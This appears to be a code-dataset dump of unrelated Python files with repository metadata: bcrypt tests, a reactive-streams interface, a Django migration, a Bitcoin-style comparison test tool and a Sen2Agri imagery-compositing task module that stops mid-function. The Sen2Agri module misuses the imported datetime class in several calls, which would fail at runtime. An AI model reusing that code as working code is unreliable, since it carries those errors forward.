[
(u"pass", b"$2b$04$cVWp4XaNU8a4v1uMRum2SO", 10, 10, TypeError),
(b"password", u"salt", 10, 10, TypeError),
(b"", b"$2b$04$cVWp4XaNU8a4v1uMRum2SO", 10, 10, ValueError),
(b"password", b"", 10, 10, ValueError),
(b"password", b"$2b$04$cVWp4XaNU8a4v1uMRum2SO", 0, 10, ValueError),
(b"password", b"$2b$04$cVWp4XaNU8a4v1uMRum2SO", -3, 10, ValueError),
(b"password", b"$2b$04$cVWp4XaNU8a4v1uMRum2SO", 513, 10, ValueError),
(b"password", b"$2b$04$cVWp4XaNU8a4v1uMRum2SO", 20, 0, ValueError),
]
)
def test_invalid_params(password, salt, desired_key_bytes, rounds, error):
with pytest.raises(error):
bcrypt.kdf(password, salt, desired_key_bytes, rounds)
def test_bcrypt_assert():
with pytest.raises(SystemError):
bcrypt._bcrypt_assert(False)
def test_2a_wraparound_bug():
assert bcrypt.hashpw(
(b"0123456789" * 26)[:255], b"$2a$04$R1lJ2gkNaoPGdafE.H.16."
) == b"$2a$04$R1lJ2gkNaoPGdafE.H.16.1MKHPvmKwryeulRe225LKProWYwt9Oi"
| 33.960954
| 79
| 0.627299
|
e0f07f13b6ce7a4c7cef814f50fc49aefcd5423e
| 322
|
py
|
Python
|
reactivestreams/subscription.py
|
Precognize/rsocket-py
|
31704d53c232e0c0f53783b9a56117e5bd0645ce
|
[
"MIT"
] | null | null | null |
reactivestreams/subscription.py
|
Precognize/rsocket-py
|
31704d53c232e0c0f53783b9a56117e5bd0645ce
|
[
"MIT"
] | null | null | null |
reactivestreams/subscription.py
|
Precognize/rsocket-py
|
31704d53c232e0c0f53783b9a56117e5bd0645ce
|
[
"MIT"
] | null | null | null |
from abc import ABCMeta, abstractmethod
class Subscription(metaclass=ABCMeta):
@abstractmethod
def request(self, n: int):
...
@abstractmethod
def cancel(self):
...
class DefaultSubscription(Subscription):
def request(self, n: int):
pass
def cancel(self):
pass
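# Minimal illustrative sketch (not part of the original module): a concrete
# Subscription that simply records demand, showing the request/cancel contract
# a publisher would drive.
class RecordingSubscription(Subscription):
    def __init__(self):
        self.requested = 0
        self.cancelled = False

    def request(self, n: int):
        # Accumulate outstanding demand signalled by the subscriber.
        self.requested += n

    def cancel(self):
        # Mark the stream as cancelled; no further items should be emitted.
        self.cancelled = True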
| 16.1
| 40
| 0.624224
|
5ba4715c45b716fb295eb9544e538d6873238a98
| 472
|
py
|
Python
|
WEB-INF/addons/helloworld/setup.py
|
wnagy/pymframe
|
1b0a220ad943ad4ca2d712e308d9a72d7388e831
|
[
"Apache-2.0"
] | null | null | null |
WEB-INF/addons/helloworld/setup.py
|
wnagy/pymframe
|
1b0a220ad943ad4ca2d712e308d9a72d7388e831
|
[
"Apache-2.0"
] | null | null | null |
WEB-INF/addons/helloworld/setup.py
|
wnagy/pymframe
|
1b0a220ad943ad4ca2d712e308d9a72d7388e831
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Helloworld Addon
W. Nagy
Minimal plugin.
Uses the local config and controller of the calling program.
"""
from helloworld.conf.config import Config as HelloworldConfig
class Helloworld(object):
controller = None
def __init__(self,controller):
self.controller = controller
def get(self):
config = HelloworldConfig()
self.controller.render('The Helloworld says: "{0}"'.format(config.greetings))
| 20.521739
| 83
| 0.70339
|
8486a84b5d143fee738e6079d074c5af9a420842
| 487
|
py
|
Python
|
src/sphinxcontrib/yamcs/javadoc.py
|
yamcs/sphinxcontrib-yamcs
|
721f0df3ad2137e67cf3cd664cb358655fb0df57
|
[
"BSD-2-Clause"
] | null | null | null |
src/sphinxcontrib/yamcs/javadoc.py
|
yamcs/sphinxcontrib-yamcs
|
721f0df3ad2137e67cf3cd664cb358655fb0df57
|
[
"BSD-2-Clause"
] | null | null | null |
src/sphinxcontrib/yamcs/javadoc.py
|
yamcs/sphinxcontrib-yamcs
|
721f0df3ad2137e67cf3cd664cb358655fb0df57
|
[
"BSD-2-Clause"
] | null | null | null |
from docutils import nodes, utils
def javadoc_role(role, rawtext, text, lineno, inliner, options={}, content=[]):
print_short_name = text.startswith("~")
if print_short_name:
text = text[1:]
idx = text.rindex(".")
label = text[(idx + 1) :]
else:
label = text
ref = "https://yamcs.org/javadoc/yamcs/%s.html" % text.replace(".", "/")
node = nodes.reference(rawtext, utils.unescape(label), refuri=ref, **options)
return [node], []
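# Illustrative note (not part of the original extension; the class name is a
# hypothetical example): a role usage like :javadoc:`~org.yamcs.YamcsServer`
# renders the short label "YamcsServer" linking to
# https://yamcs.org/javadoc/yamcs/org/yamcs/YamcsServer.html, while
# :javadoc:`org.yamcs.YamcsServer` keeps the fully qualified label.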
| 30.4375
| 81
| 0.603696
|
b74fb140bfff012e7f0c4330c7dbf721547c6ef7
| 614
|
py
|
Python
|
Tests/image_tests/renderpasses/test_MVecRaster.py
|
wsqjny/Falcor
|
9ebbb0a0426304a542a6ec314c9470e0c043093f
|
[
"BSD-3-Clause"
] | 1,615
|
2017-07-28T05:41:39.000Z
|
2022-03-31T16:31:57.000Z
|
Tests/image_tests/renderpasses/test_MVecRaster.py
|
shill-lucasfilm/Falcor
|
5236495554f57a734cc815522d95ae9a7dfe458a
|
[
"BSD-3-Clause"
] | 232
|
2017-08-03T10:58:41.000Z
|
2022-03-31T16:17:46.000Z
|
Tests/image_tests/renderpasses/test_MVecRaster.py
|
shill-lucasfilm/Falcor
|
5236495554f57a734cc815522d95ae9a7dfe458a
|
[
"BSD-3-Clause"
] | 383
|
2017-07-30T04:28:34.000Z
|
2022-03-30T05:12:13.000Z
|
import sys
sys.path.append('..')
from helpers import render_frames
from graphs.MVecRaster import MVecRaster as g
from falcor import *
sceneFile = 'Cerberus/Standard/Cerberus.pyscene'
m.addGraph(g)
m.loadScene(sceneFile)
# default
render_frames(m, 'default', frames=[1,16,64])
# re-load scene with 32-bit indices
m.loadScene(sceneFile, buildFlags=SceneBuilderFlags.Force32BitIndices)
render_frames(m, '32bit-indices', frames=[1,16,64])
# re-load scene with non-indexed vertices
m.loadScene(sceneFile, buildFlags=SceneBuilderFlags.NonIndexedVertices)
render_frames(m, 'non-indexed', frames=[1,16,64])
exit()
| 23.615385
| 71
| 0.778502
|
92f2f0df370ff6ad3c19574c1c849f73c1ae1bfc
| 1,015
|
py
|
Python
|
like/migrations/0001_initial.py
|
engineer237/Project-Track-Api
|
505f95d886144bbafd00797b25bd1c8940529e3f
|
[
"MIT"
] | null | null | null |
like/migrations/0001_initial.py
|
engineer237/Project-Track-Api
|
505f95d886144bbafd00797b25bd1c8940529e3f
|
[
"MIT"
] | null | null | null |
like/migrations/0001_initial.py
|
engineer237/Project-Track-Api
|
505f95d886144bbafd00797b25bd1c8940529e3f
|
[
"MIT"
] | null | null | null |
# Generated by Django 4.0.3 on 2022-04-12 14:56
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('projects', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Like',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choices', models.CharField(choices=[('like', 'like'), ('unlike', 'unlike')], max_length=10)),
('project', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='projects', to='projects.project')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='users', to=settings.AUTH_USER_MODEL)),
],
),
]
| 36.25
| 152
| 0.64335
|
8832466f0080748ab58ed182b56c139d2895ddc0
| 805
|
py
|
Python
|
143. Reorder List/143. Reorder List.py
|
JawadAsifBD/leetcode
|
15c3bd0363f2a0bf2956fec38c095a955ca6c000
|
[
"MIT"
] | null | null | null |
143. Reorder List/143. Reorder List.py
|
JawadAsifBD/leetcode
|
15c3bd0363f2a0bf2956fec38c095a955ca6c000
|
[
"MIT"
] | null | null | null |
143. Reorder List/143. Reorder List.py
|
JawadAsifBD/leetcode
|
15c3bd0363f2a0bf2956fec38c095a955ca6c000
|
[
"MIT"
] | null | null | null |
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
def reorderList(self, head: Optional[ListNode]) -> None:
"""
Do not return anything, modify head in-place instead.
"""
res = Deque()
cur = head
while cur:
res.append(cur)
cur = cur.next
prev = None
while len(res) >= 2:
h = res.popleft()
t = res.pop()
if prev:
prev.next = h
h.next = t
prev = t
if len(res) > 0:
h = res.pop()
if prev:
prev.next = h
prev = h
if prev:
prev.next = None
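        # Illustrative trace (comment only, not part of the submission): for
        # 1->2->3->4 the alternating head/tail pops yield 1->4->2->3, and for
        # 1->2->3->4->5 the middle node is appended last, giving 1->5->2->4->3.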
| 23.676471
| 61
| 0.437267
|
b8937c4552267629592829c87850c33dc40f30e5
| 18,398
|
py
|
Python
|
test/functional/test_framework/comptool.py
|
ravenjetcoin/ravenjetcoin
|
6b76a19818f26ffde5bc9dd6bb5385143d8417b3
|
[
"MIT"
] | null | null | null |
test/functional/test_framework/comptool.py
|
ravenjetcoin/ravenjetcoin
|
6b76a19818f26ffde5bc9dd6bb5385143d8417b3
|
[
"MIT"
] | null | null | null |
test/functional/test_framework/comptool.py
|
ravenjetcoin/ravenjetcoin
|
6b76a19818f26ffde5bc9dd6bb5385143d8417b3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Copyright (c) 2017 The Marlin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Compare two or more marlinds to each other.
To use, create a class that implements get_tests(), and pass it in
as the test generator to TestManager. get_tests() should be a python
generator that returns TestInstance objects. See below for definition.
TestNode behaves as follows:
Configure with a BlockStore and TxStore
on_inv: log the message but don't request
on_headers: log the chain tip
on_pong: update ping response map (for synchronization)
on_getheaders: provide headers via BlockStore
on_getdata: provide blocks via BlockStore
"""
from .mininode import *
from .blockstore import BlockStore, TxStore
from .util import p2p_port, wait_until
import logging
logger=logging.getLogger("TestFramework.comptool")
global mininode_lock
class RejectResult():
"""Outcome that expects rejection of a transaction or block."""
def __init__(self, code, reason=b''):
self.code = code
self.reason = reason
def match(self, other):
if self.code != other.code:
return False
return other.reason.startswith(self.reason)
def __repr__(self):
return '%i:%s' % (self.code,self.reason or '*')
class TestNode(NodeConnCB):
def __init__(self, block_store, tx_store):
super().__init__()
self.conn = None
self.bestblockhash = None
self.block_store = block_store
self.block_request_map = {}
self.tx_store = tx_store
self.tx_request_map = {}
self.block_reject_map = {}
self.tx_reject_map = {}
# When the pingmap is non-empty we're waiting for
# a response
self.pingMap = {}
self.lastInv = []
self.closed = False
def on_close(self, conn):
self.closed = True
def add_connection(self, conn):
self.conn = conn
def on_headers(self, conn, message):
if len(message.headers) > 0:
best_header = message.headers[-1]
best_header.calc_sha256()
self.bestblockhash = best_header.sha256
def on_getheaders(self, conn, message):
response = self.block_store.headers_for(message.locator, message.hashstop)
if response is not None:
conn.send_message(response)
def on_getdata(self, conn, message):
[conn.send_message(r) for r in self.block_store.get_blocks(message.inv)]
[conn.send_message(r) for r in self.tx_store.get_transactions(message.inv)]
for i in message.inv:
if i.type == 1:
self.tx_request_map[i.hash] = True
elif i.type == 2:
self.block_request_map[i.hash] = True
def on_inv(self, conn, message):
self.lastInv = [x.hash for x in message.inv]
def on_pong(self, conn, message):
try:
del self.pingMap[message.nonce]
except KeyError:
raise AssertionError("Got pong for unknown ping [%s]" % repr(message))
def on_reject(self, conn, message):
if message.message == b'tx':
self.tx_reject_map[message.data] = RejectResult(message.code, message.reason)
if message.message == b'block':
self.block_reject_map[message.data] = RejectResult(message.code, message.reason)
def send_inv(self, obj):
mtype = 2 if isinstance(obj, CBlock) else 1
self.conn.send_message(msg_inv([CInv(mtype, obj.sha256)]))
def send_getheaders(self):
# We ask for headers from their last tip.
m = msg_getheaders()
m.locator = self.block_store.get_locator(self.bestblockhash)
self.conn.send_message(m)
def send_header(self, header):
m = msg_headers()
m.headers.append(header)
self.conn.send_message(m)
# This assumes BIP31
def send_ping(self, nonce):
self.pingMap[nonce] = True
self.conn.send_message(msg_ping(nonce))
def received_ping_response(self, nonce):
return nonce not in self.pingMap
def send_mempool(self):
self.lastInv = []
self.conn.send_message(msg_mempool())
# TestInstance:
#
# Instances of these are generated by the test generator, and fed into the
# comptool.
#
# "blocks_and_transactions" should be an array of
# [obj, True/False/None, hash/None]:
# - obj is either a CBlock, CBlockHeader, or a CTransaction, and
# - the second value indicates whether the object should be accepted
# into the blockchain or mempool (for tests where we expect a certain
# answer), or "None" if we don't expect a certain answer and are just
# comparing the behavior of the nodes being tested.
# - the third value is the hash to test the tip against (if None or omitted,
# use the hash of the block)
# - NOTE: if a block header, no test is performed; instead the header is
# just added to the block_store. This is to facilitate block delivery
# when communicating with headers-first clients (when withholding an
# intermediate block).
# sync_every_block: if True, then each block will be inv'ed, synced, and
# nodes will be tested based on the outcome for the block. If False,
# then inv's accumulate until all blocks are processed (or max inv size
# is reached) and then sent out in one inv message. Then the final block
# will be synced across all connections, and the outcome of the final
# block will be tested.
# sync_every_tx: analogous to behavior for sync_every_block, except if outcome
# on the final tx is None, then contents of entire mempool are compared
# across all connections. (If outcome of final tx is specified as true
# or false, then only the last tx is tested against outcome.)
class TestInstance():
def __init__(self, objects=None, sync_every_block=True, sync_every_tx=False):
self.blocks_and_transactions = objects if objects else []
self.sync_every_block = sync_every_block
self.sync_every_tx = sync_every_tx
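# Hedged sketch (not part of the framework): a get_tests() generator as described
# above might yield instances like the following, where `block` is a CBlock the
# nodes are expected to accept and `bad_tx` a CTransaction expected to be rejected
# with reject code 16 (both objects are hypothetical and built elsewhere in a test):
#
#   yield TestInstance([[block, True]])
#   yield TestInstance([[bad_tx, RejectResult(16, b'bad-txns')]], sync_every_tx=True)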
class TestManager():
def __init__(self, testgen, datadir):
self.test_generator = testgen
self.connections = []
self.test_nodes = []
self.block_store = BlockStore(datadir)
self.tx_store = TxStore(datadir)
self.ping_counter = 1
def add_all_connections(self, nodes):
for i in range(len(nodes)):
# Create a p2p connection to each node
test_node = TestNode(self.block_store, self.tx_store)
self.test_nodes.append(test_node)
self.connections.append(NodeConn('127.0.0.1', p2p_port(i), nodes[i], test_node))
# Make sure the TestNode (callback class) has a reference to its
# associated NodeConn
test_node.add_connection(self.connections[-1])
def clear_all_connections(self):
self.connections = []
self.test_nodes = []
def wait_for_disconnections(self):
def disconnected():
return all(node.closed for node in self.test_nodes)
wait_until(disconnected, timeout=10, lock=mininode_lock)
def wait_for_verack(self):
return all(node.wait_for_verack() for node in self.test_nodes)
def wait_for_pings(self, counter):
def received_pongs():
return all(node.received_ping_response(counter) for node in self.test_nodes)
wait_until(received_pongs, lock=mininode_lock)
# sync_blocks: Wait for all connections to request the blockhash given
# then send get_headers to find out the tip of each node, and synchronize
# the response by using a ping (and waiting for pong with same nonce).
def sync_blocks(self, blockhash, num_blocks):
def blocks_requested():
return all(
blockhash in node.block_request_map and node.block_request_map[blockhash]
for node in self.test_nodes
)
# --> error if not requested
wait_until(blocks_requested, attempts=20*num_blocks, lock=mininode_lock)
# Send getheaders message
[ c.cb.send_getheaders() for c in self.connections ]
# Send ping and wait for response -- synchronization hack
[ c.cb.send_ping(self.ping_counter) for c in self.connections ]
self.wait_for_pings(self.ping_counter)
self.ping_counter += 1
    # Analogous to sync_blocks (see above)
def sync_transaction(self, txhash, num_events):
# Wait for nodes to request transaction (50ms sleep * 20 tries * num_events)
def transaction_requested():
return all(
txhash in node.tx_request_map and node.tx_request_map[txhash]
for node in self.test_nodes
)
# --> error if not requested
wait_until(transaction_requested, attempts=20*num_events, lock=mininode_lock)
# Get the mempool
[ c.cb.send_mempool() for c in self.connections ]
# Send ping and wait for response -- synchronization hack
[ c.cb.send_ping(self.ping_counter) for c in self.connections ]
self.wait_for_pings(self.ping_counter)
self.ping_counter += 1
# Sort inv responses from each node
with mininode_lock:
[ c.cb.lastInv.sort() for c in self.connections ]
# Verify that the tip of each connection all agree with each other, and
# with the expected outcome (if given)
def check_results(self, blockhash, outcome):
with mininode_lock:
for c in self.connections:
if outcome is None:
if c.cb.bestblockhash != self.connections[0].cb.bestblockhash:
return False
elif isinstance(outcome, RejectResult): # Check that block was rejected w/ code
if c.cb.bestblockhash == blockhash:
return False
if blockhash not in c.cb.block_reject_map:
logger.error('Block not in reject map: %064x' % (blockhash))
return False
if not outcome.match(c.cb.block_reject_map[blockhash]):
logger.error('Block rejected with %s instead of expected %s: %064x' % (c.cb.block_reject_map[blockhash], outcome, blockhash))
return False
elif ((c.cb.bestblockhash == blockhash) != outcome):
return False
return True
# Either check that the mempools all agree with each other, or that
# txhash's presence in the mempool matches the outcome specified.
# This is somewhat of a strange comparison, in that we're either comparing
# a particular tx to an outcome, or the entire mempools altogether;
# perhaps it would be useful to add the ability to check explicitly that
# a particular tx's existence in the mempool is the same across all nodes.
def check_mempool(self, txhash, outcome):
with mininode_lock:
for c in self.connections:
if outcome is None:
# Make sure the mempools agree with each other
if c.cb.lastInv != self.connections[0].cb.lastInv:
return False
elif isinstance(outcome, RejectResult): # Check that tx was rejected w/ code
if txhash in c.cb.lastInv:
return False
if txhash not in c.cb.tx_reject_map:
logger.error('Tx not in reject map: %064x' % (txhash))
return False
if not outcome.match(c.cb.tx_reject_map[txhash]):
logger.error('Tx rejected with %s instead of expected %s: %064x' % (c.cb.tx_reject_map[txhash], outcome, txhash))
return False
elif ((txhash in c.cb.lastInv) != outcome):
return False
return True
def run(self):
# Wait until verack is received
self.wait_for_verack()
test_number = 1
for test_instance in self.test_generator.get_tests():
# We use these variables to keep track of the last block
# and last transaction in the tests, which are used
# if we're not syncing on every block or every tx.
[ block, block_outcome, tip ] = [ None, None, None ]
[ tx, tx_outcome ] = [ None, None ]
invqueue = []
for test_obj in test_instance.blocks_and_transactions:
b_or_t = test_obj[0]
outcome = test_obj[1]
# Determine if we're dealing with a block or tx
if isinstance(b_or_t, CBlock): # Block test runner
block = b_or_t
block_outcome = outcome
tip = block.sha256
# each test_obj can have an optional third argument
# to specify the tip we should compare with
# (default is to use the block being tested)
if len(test_obj) >= 3:
tip = test_obj[2]
# Add to shared block_store, set as current block
# If there was an open getdata request for the block
# previously, and we didn't have an entry in the
# block_store, then immediately deliver, because the
# node wouldn't send another getdata request while
# the earlier one is outstanding.
first_block_with_hash = True
if self.block_store.get(block.sha256) is not None:
first_block_with_hash = False
with mininode_lock:
self.block_store.add_block(block)
for c in self.connections:
if first_block_with_hash and block.sha256 in c.cb.block_request_map and c.cb.block_request_map[block.sha256] == True:
# There was a previous request for this block hash
# Most likely, we delivered a header for this block
# but never had the block to respond to the getdata
c.send_message(msg_block(block))
else:
c.cb.block_request_map[block.sha256] = False
# Either send inv's to each node and sync, or add
# to invqueue for later inv'ing.
if (test_instance.sync_every_block):
# if we expect success, send inv and sync every block
# if we expect failure, just push the block and see what happens.
if outcome == True:
[ c.cb.send_inv(block) for c in self.connections ]
self.sync_blocks(block.sha256, 1)
else:
[ c.send_message(msg_block(block)) for c in self.connections ]
[ c.cb.send_ping(self.ping_counter) for c in self.connections ]
self.wait_for_pings(self.ping_counter)
self.ping_counter += 1
if (not self.check_results(tip, outcome)):
raise AssertionError("Test failed at test %d" % test_number)
else:
invqueue.append(CInv(2, block.sha256))
elif isinstance(b_or_t, CBlockHeader):
block_header = b_or_t
self.block_store.add_header(block_header)
[ c.cb.send_header(block_header) for c in self.connections ]
else: # Tx test runner
assert(isinstance(b_or_t, CTransaction))
tx = b_or_t
tx_outcome = outcome
# Add to shared tx store and clear map entry
with mininode_lock:
self.tx_store.add_transaction(tx)
for c in self.connections:
c.cb.tx_request_map[tx.sha256] = False
# Again, either inv to all nodes or save for later
if (test_instance.sync_every_tx):
[ c.cb.send_inv(tx) for c in self.connections ]
self.sync_transaction(tx.sha256, 1)
if (not self.check_mempool(tx.sha256, outcome)):
raise AssertionError("Test failed at test %d" % test_number)
else:
invqueue.append(CInv(1, tx.sha256))
# Ensure we're not overflowing the inv queue
if len(invqueue) == MAX_INV_SZ:
[ c.send_message(msg_inv(invqueue)) for c in self.connections ]
invqueue = []
# Do final sync if we weren't syncing on every block or every tx.
if (not test_instance.sync_every_block and block is not None):
if len(invqueue) > 0:
[ c.send_message(msg_inv(invqueue)) for c in self.connections ]
invqueue = []
self.sync_blocks(block.sha256, len(test_instance.blocks_and_transactions))
if (not self.check_results(tip, block_outcome)):
raise AssertionError("Block test failed at test %d" % test_number)
if (not test_instance.sync_every_tx and tx is not None):
if len(invqueue) > 0:
[ c.send_message(msg_inv(invqueue)) for c in self.connections ]
invqueue = []
self.sync_transaction(tx.sha256, len(test_instance.blocks_and_transactions))
if (not self.check_mempool(tx.sha256, tx_outcome)):
raise AssertionError("Mempool test failed at test %d" % test_number)
logger.info("Test %d: PASS" % test_number)
test_number += 1
[ c.disconnect_node() for c in self.connections ]
self.wait_for_disconnections()
self.block_store.close()
self.tx_store.close()
| 45.093137
| 149
| 0.601044
|
2720e91bc30bf9ae3b1e75d301b22a1d046f6bcf
| 15,310
|
py
|
Python
|
worker/tasks/sen2agri_tasks_l3a.py
|
wscullen/tile_viewer_api
|
da4aeb14aefe4ab5e3c1c7f573d726d71a14cbe7
|
[
"MIT"
] | null | null | null |
worker/tasks/sen2agri_tasks_l3a.py
|
wscullen/tile_viewer_api
|
da4aeb14aefe4ab5e3c1c7f573d726d71a14cbe7
|
[
"MIT"
] | null | null | null |
worker/tasks/sen2agri_tasks_l3a.py
|
wscullen/tile_viewer_api
|
da4aeb14aefe4ab5e3c1c7f573d726d71a14cbe7
|
[
"MIT"
] | 1
|
2020-11-04T17:43:32.000Z
|
2020-11-04T17:43:32.000Z
|
""" This job runs Sen2agri atmospheric correction on a L1C Products previously downloaded.
Inputs: ImageryList
Optional Inputs: WindowSize (default 3)
Maja Version (default 3.2.2)
Outputs: Corrected product uploaded
to S3 bucket
Dependencies: maccs-maja, sen2agri installation
Major Steps
1. Parse Imagery List into DateList
2. Create command for each date
For each date
3. Check if L2A results exist already on S3
4. Download L1C and previously created L2A for all Dates but Date 0
5. Run demmaccs.py command for that date
6. Upload resulting L2A imagery to S3
7. Clean up local
Notes:
    In the future, a conversion to a COG tif (cloud optimized geotiff) would be a
good addition.
"""
# Create your tasks here
from __future__ import absolute_import, unicode_literals
import boto3
from botocore.client import Config
import botocore
from celery import group, shared_task, task
import click
import logging
from datetime import datetime, timedelta
from django.db.models import Q
from django.conf import settings
import json
import logging
import math
import multiprocessing
from pathlib import Path
import os
from osgeo import gdal
import re
import shutil
import subprocess
import sys
import tarfile
import time
import zipfile
from common.s3_utils import S3Utility
from common.utils import TaskStatus, unarchive, clean_up_folder, run_cmd
# from landsat_downloader import l8_downloader
s3_helper = S3Utility(settings.S3_CONFIG, Path(settings.BASE_DIR, "working_folder"))
module_logger = logging.getLogger("worker.sen2agri.tasks")
INPUT_BUCKET_NAME = "sen2agri-l2a"
OUTPUT_BUCKET_NAME = "sen2agri-l3a"
WORKING_FOLDER_PATH = Path(settings.BASE_DIR, "working_folder")
STATUS_FOLDER_PATH = Path(WORKING_FOLDER_PATH, "status")
OUTPUT_FOLDER_PATH = Path(WORKING_FOLDER_PATH, "output")
INPUT_FOLDER_PATH = Path(WORKING_FOLDER_PATH, "input")
def write_result_to_status_folder(result_list, job_id):
"""After the job completes it should write out a json file with success info
The Json should be written to the status folder, to be used by the parent
process to report job failure or success to the server
result_list should be a list of tuples with
('sub_task_name', False, 'result_message')
file_name_format = JobStatus_YYYYMMDD_hhmm_job_id.json
"""
    date_now = datetime.now()
date_string = date_now.strftime("%Y%m%d_%H%M")
file_name = f"SimplifyS1Tif_{date_string}_{job_id}.json"
file_full_path = Path(STATUS_FOLDER_PATH, file_name)
with open(file_full_path, "w") as outfile:
json.dump(result_list, outfile)
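# Illustrative sketch (hypothetical values): a call such as
#   write_result_to_status_folder([("download_l1c", True, "ok")], "42")
# made on 2019-07-03 at 18:29 writes the list as JSON to
#   STATUS_FOLDER_PATH/SimplifyS1Tif_20190703_1829_42.json
# (note that the prefix used in the code differs from the JobStatus_* format
# mentioned in the docstring above).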
def find_l2a_path(l1c_path):
module_logger.info(l1c_path)
name = Path(l1c_path).name
module_logger.info(name)
sat = name[2]
date = name.split("_")[2]
orbit = name.split("_")[4]
tile = name.split("_")[5]
l2a_name = None
regex_str = r"S2{}_MSIL2A_{}_N\d{{4}}_{}_{}_\d{{8}}T\d{{6}}.SAFE".format(
sat, date, orbit, tile
)
# iterate over work dir, find a dir that matches the regex
for thing in os.listdir(WORKING_FOLDER_PATH):
module_logger.info(thing)
search_result = re.search(regex_str, thing)
module_logger.info(search_result)
if search_result:
return Path(WORKING_FOLDER_PATH, thing)
return l2a_name
def check_l2a_imagery_exists(imagery_date, tile_name, aoi_name):
"""
imagery date format '20180809'
tile format = 'T14UNV'
"""
logging.info("checking if imagery exists on s2")
logging.info(imagery_date)
logging.info(tile_name)
search_expression = r"SENTINEL2[A|B]_{}-\d{{6}}-\d{{3}}_L2A_{}_C_V1-0".format(
imagery_date, tile_name
)
logging.info(search_expression)
# search_expresssion, object_prefix, bucket_name
object_exists = s3_helper.check_object_exists_in_s3_wildcards(
search_expression, str(Path(aoi_name, "sentinel2")), INPUT_BUCKET_NAME
)
logging.info("object_exists in l2a?")
logging.info(object_exists)
return object_exists
def check_if_l2a_imagery_exists_local(l1c_input):
logging.info(l1c_input)
name_parts = l1c_input.split("_")
search_expression = r"SENTINEL2[A|B]_{}-\d{{6}}-\d{{3}}_L2A_{}_C_V1-0".format(
name_parts[2][:8], name_parts[5]
)
logging.info(search_expression)
result_path = None
for folder in os.listdir(OUTPUT_FOLDER_PATH):
search_result = re.search(search_expression, folder)
logging.info(folder)
if search_result:
result_path = Path(OUTPUT_FOLDER_PATH, folder)
logging.info(result_path)
return result_path
def check_if_l2a_imagery_exists(imagery_date, l1c_name):
logging.info("checking if imagery exists on s2")
logging.info(l1c_name)
name_parts = l1c_name.split("_")
    if imagery_date is None:
imagery_date = name_parts[2][:8]
search_expression = r"SENTINEL2[A|B]_{}-\d{{6}}-\d{{3}}_L2A_{}_C_V1-0".format(
imagery_date, name_parts[1]
)
logging.info(search_expression)
logging.info("checking if object exists in s3 with wildcards")
# search_expresssion, object_prefix, bucket_name
object_exists = s3_helper.check_object_exists_in_s3_wildcards(
search_expression, "s2", "sen2agri-l2a"
)
return object_exists
def check_if_l2a_imagery_exists_local_date_tile(current_date, tile):
logging.info(f"checking for local sen2agri for date {current_date} and tile {tile}")
search_expression = r"SENTINEL2[A|B]_{}-\d{{6}}-\d{{3}}_L2A_{}_C_V1-0".format(
current_date, tile
)
logging.info(search_expression)
result_path = None
for folder in os.listdir(WORKING_FOLDER_PATH):
search_result = re.search(search_expression, folder)
logging.info(folder)
if search_result:
result_path = Path(WORKING_FOLDER_PATH, folder)
logging.info(result_path)
return result_path
def find_l2a_xml_paths_in_working_folder(date_list, tile):
path_list = []
logging.info(date_list)
# Example product
# SENTINEL2A_20180521-173646-866_L2A_T14UNA_C_V1-0/
for d in date_list:
for product_dir in os.listdir(WORKING_FOLDER_PATH):
regex_str = r"SENTINEL2[A|B]_{}-\d{{6}}-\d{{3}}_L2A_{}_C_V1-0".format(
d, tile
)
logging.info(regex_str)
search_result = re.search(regex_str, product_dir)
if search_result:
for f in os.listdir(Path(WORKING_FOLDER_PATH, product_dir)):
if f.find("MTD_ALL.xml") != -1:
path_list.append(Path(WORKING_FOLDER_PATH, product_dir, f))
break
return path_list
def create_l3a_composite(
synthdate, synth_halflength, tile, imagery_date_list, window_size
):
"""
Major steps:
2. Construct command including imagery
3. Upload result to S3
"""
logging.info("run composite command here\n\n\n\n\n")
logging.info("----------------------------------------")
path_list = find_l2a_xml_paths_in_working_folder(imagery_date_list, tile)
logging.info(path_list)
composite_command = f'/usr/bin/composite_processing.py --tileid {tile} --syntdate {synthdate} --synthalf {synth_halflength} --input {" ".join([str(p) for p in path_list])} --res 10 --outdir {OUTPUT_FOLDER_PATH} --bandsmap /usr/share/sen2agri/bands_mapping_s2_L8.txt --scatteringcoef /usr/share/sen2agri/scattering_coeffs_10m.txt'
logging.info(composite_command)
result = run_cmd(composite_command)
return result
def get_imagery_in_window_from_synthdate(synthdate, all_dates, window_length=30):
    synthdate_date = datetime.strptime(synthdate, "%Y%m%d")
    synth_startperiod = synthdate_date - timedelta(days=window_length)
    synth_endperiod = synthdate_date + timedelta(days=window_length)
synthwindow_dates = []
for d in all_dates:
        date_obj = datetime.strptime(d, "%Y%m%d")
if synth_startperiod <= date_obj <= synth_endperiod:
logging.info("date is in window, adding to list")
synthwindow_dates.append(d)
return synthwindow_dates
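# Worked example (hypothetical dates): with synthdate "20190715" and the default
# window_length of 30, the window spans 20190615..20190814, so from
# all_dates = ["20190613", "20190618", "20190718"] only "20190618" and "20190718"
# fall inside the window and are returned.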
@shared_task
def generate_l3a(imagery_list, window_size, aoi_name):
# Determine dates
all_dates = list(imagery_list.keys())
# Determine dates on a per tile basis
tile_dict = {}
for d in all_dates:
image_list = imagery_list[d]
for image in image_list:
# get the tile
tile = image.split("_")[5]
if tile in tile_dict:
tile_dict[tile].append(d)
else:
tile_dict[tile] = []
tile_dict[tile].append(d)
logging.info(imagery_list)
logging.info(tile_dict)
    # determine the date window length and divide it into 30-day periods
start_date = datetime.strptime(all_dates[0], "%Y%m%d")
end_date = datetime.strptime(all_dates[-1], "%Y%m%d")
synthdates = []
new_date = start_date
logging.info((end_date - new_date).days)
while (end_date - new_date).days > 30:
new_date = new_date + timedelta(days=30)
synthdates.append(new_date)
logging.info(synthdates)
synthdates_str = [d.strftime("%Y%m%d") for d in synthdates]
